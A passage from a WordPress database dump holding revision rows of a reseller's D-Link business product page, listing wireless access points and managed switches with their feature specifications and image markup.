Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:45:03','2019-09-25 06:45:03','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3413,1,'2019-09-25 14:46:45','2019-09-25 06:46:45','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:46:45','2019-09-25 06:46:45','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3414,1,'2019-09-25 14:56:42','2019-09-25 06:56:42','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection 